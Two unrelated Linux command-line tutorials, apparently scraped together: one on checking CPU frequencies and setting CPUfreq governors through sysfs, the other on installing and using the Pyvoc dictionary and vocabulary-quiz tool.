Finding each core’s minimum, current & maximum frequency


grep '' /sys/devices/system/cpu/cpu0/cpufreq/scaling_{min,cur,max}_freq


Sample output:


/sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq:1596000
/sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq:1596000
/sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq:2933000


Here we can see that the current processor frequency is 1596 MHz and the maximum is 2933 MHz.


The above example is for core 0; if you have N cores, use the * wildcard to cover them all:


grep '' /sys/devices/system/cpu/cpu*/cpufreq/scaling_{min,cur,max}_freq


Sample output :


/sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq:1596000
/sys/devices/system/cpu/cpu1/cpufreq/scaling_min_freq:1596000
/sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq:1596000
/sys/devices/system/cpu/cpu1/cpufreq/scaling_cur_freq:2128000
/sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq:2933000
/sys/devices/system/cpu/cpu1/cpufreq/scaling_max_freq:2933000


How to find the CPU count?


grep -c 'model name' /proc/cpuinfo


Sample output :


2
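A simpler alternative, available on any system with GNU coreutils, is the nproc command, which prints the number of processing units directly:

nproc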
Using the various frequency governors

ondemand: The CPUfreq governor “ondemand” sets the CPU frequency depending on the current usage. To do this, the CPU must have the capability to switch the frequency very quickly.

conservative: The CPUfreq governor “conservative”, much like the “ondemand” governor, sets the CPU frequency depending on the current usage. It differs in behavior in that it gracefully increases and decreases the CPU speed rather than jumping to max speed the moment there is any load on the CPU. This behavior is more suitable in a battery-powered environment.

userspace: The CPUfreq governor “userspace” allows the user, or any user-space program running with UID “root”, to set the CPU to a specific frequency by making a sysfs file “scaling_setspeed” available in the CPU-device directory.

powersave: The CPUfreq governor “powersave” sets the CPU statically to the lowest frequency within the borders of scaling_min_freq and scaling_max_freq.

performance: The CPUfreq governor “performance” sets the CPU statically to the highest frequency within the borders of scaling_min_freq and scaling_max_freq.

How to find available_governors?


cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors


Sample output:


conservative ondemand userspace powersave performance


Set one (e.g. performance). Note that a plain sudo echo with a redirect fails, because the redirection is performed by your unprivileged shell, so use tee instead:

echo performance | sudo tee /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor


cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor


performance
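As an aside, if the cpupower utility is installed (the package name varies by distribution, e.g. kernel-tools or linux-tools), it reports all of the above in one place:

cpupower frequency-info

This prints the active driver, the available governors, the hardware frequency limits, and the current policy for each CPU.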

Source

A Command line Dictionary And Vocabulary Building Tool

Howdy! I have good news for non-native English speakers. Now, you can improve your English vocabulary and find the meanings of English words right from your Terminal. Say hello to Pyvoc, a cross-platform, open source, command-line dictionary and vocabulary-building tool written in the Python programming language. Using this tool, you can brush up on English word meanings, test or improve your vocabulary, or simply use it as a CLI dictionary on Unix-like operating systems.

Installing Pyvoc

Since Pyvoc is written in Python, you can install it using the pip3 package manager.

$ pip3 install pyvoc

Once installed, run the following command to automatically create necessary configuration files in your $HOME directory.

$ pyvoc word

Sample output:

|Creating necessary config files
/getting api keys. please handle with care!
|

word 
Noun: single meaningful element of speech or writing
example: I don't like the word ‘unofficial’

Verb: express something spoken or written
example: he words his request in a particularly ironic way

Interjection: used to express agreement or affirmation
example: Word, that's a good record, man

Done! Let us go ahead and brush up those English skills.

Use Pyvoc as a command line Dictionary tool

Pyvoc fetches the word meaning from Oxford Dictionary API.

Let us say you want to find the meaning of the word ‘digression’. To do so, run:

$ pyvoc digression

Find a word meaning using Pyvoc

See? Pyvoc not only displays the meaning of the word ‘digression’, but also an example sentence showing how to use that word in practice.

Let us see another example.

$ pyvoc subterfuge
|

subterfuge 
Noun: deceit used in order to achieve one's goal
example: he had to use subterfuge and bluff on many occasions

It also shows the word classes. As you already know, English has four major word classes:

  1. Nouns,
  2. Verbs,
  3. Adjectives,
  4. Adverbs.

Take a look at the following example.

$ pyvoc welcome
 /

welcome 
Noun:            instance or manner of greeting someone
example:         you will receive a warm welcome

Interjection:    used to greet someone in polite or friendly way
example:         welcome to the Wildlife Park

Verb:            greet someone arriving in polite or friendly way
example:         hotels should welcome guests in their own language

Adjective:       gladly received
example:         I'm pleased to see you, lad—you're welcome

As you can see in the above output, the word ‘welcome’ can be used as a verb, noun, adjective, and interjection. Pyvoc gives an example for each class.

If you misspell a word, Pyvoc will prompt you to check the spelling of the given word.

$ pyvoc wlecome
\
No definition found. Please check the spelling!!

Useful, isn’t it?

Create vocabulary groups

A vocabulary group is nothing but a collection of words added by the user. You can later revise these groups or take quizzes from them. 100 groups of 60 words each are reserved for the user.

To add a word (e.g. sporadic) to a group, just run:

$ pyvoc sporadic -a
-

sporadic 
Adjective: occurring at irregular intervals or only in few places
example: sporadic fighting broke out


writing to vocabulary group...
word added to group number 51

As you can see, I didn’t provide any group number, and pyvoc displayed the meaning of the given word and automatically added it to group number 51. If you don’t provide a group number, Pyvoc will incrementally add words to groups 51-100.

Pyvoc also allows you to specify a group number if you want to. You can specify a group from 1-50 using the -g option. For example, I am going to add a word to vocabulary group 20 using the following command.

$ pyvoc discrete -a -g 20
 /

discrete 
Adjective:       individually separate and distinct
example:         speech sounds are produced as a continuous sound signal rather
               than discrete units

creating group Number 20...
writing to vocabulary group...
word added to group number 20

See? The above command displays the meaning of the word ‘discrete’ and adds it to vocabulary group 20. If the group doesn’t exist, Pyvoc will create it and add the word.

By default, Pyvoc includes three predefined vocabulary groups (101, 102, and 103), each containing 800 words. All words in these groups are taken from GRE and SAT preparation websites.

To view the user-generated groups, simply run:

$ pyvoc word -l
 -

word 
Noun:            single meaningful element of speech or writing
example:         I don't like the word ‘unofficial’

Verb:            express something spoken or written
example:         he words his request in a particularly ironic way

Interjection:    used to express agreement or affirmation
example:         Word, that's a good record, man


USER GROUPS
Group no.      No. of words
20             1

DEFAULT GROUP
Group no.      No. of words
51             1

As you can see, I have created one group (20), in addition to the default group (51).

Test and improve English vocabulary

As I already said, you can use vocabulary groups for revision or quizzes.

For instance, to revise group no. 101, use the -r option like below.

$ pyvoc 101 -r

You can now revise the meanings of all words in vocabulary group 101 in random order. Just hit ENTER to go to the next question. Once done, hit CTRL+C to exit.


Revise Vocabulary group

Also, you can take quizzes from the existing groups to brush up your vocabulary. To do so, use the -q option like below.

$ pyvoc 103 -q 50

This command gives you a quiz of 50 questions from vocabulary group 103. Choose the correct answer from the list by entering the appropriate number. You get 1 point for every correct answer; the more you score, the stronger your vocabulary becomes.


Take quiz using Pyvoc

Pyvoc is in the early-development stage. I hope the developer will improve it and add more features in the days to come.

As a non-native English speaker, I personally find it useful to test and learn new word meanings in my free time. If you’re a heavy command-line user who wants to quickly check the meaning of a word, Pyvoc is the right tool. You can also test your English vocabulary in your free time to memorize and improve your English language skills. Give it a try. You won’t be disappointed.

And, that’s all for now. Hope this was useful. More good stuffs to come. Stay tuned! Cheers!


Source
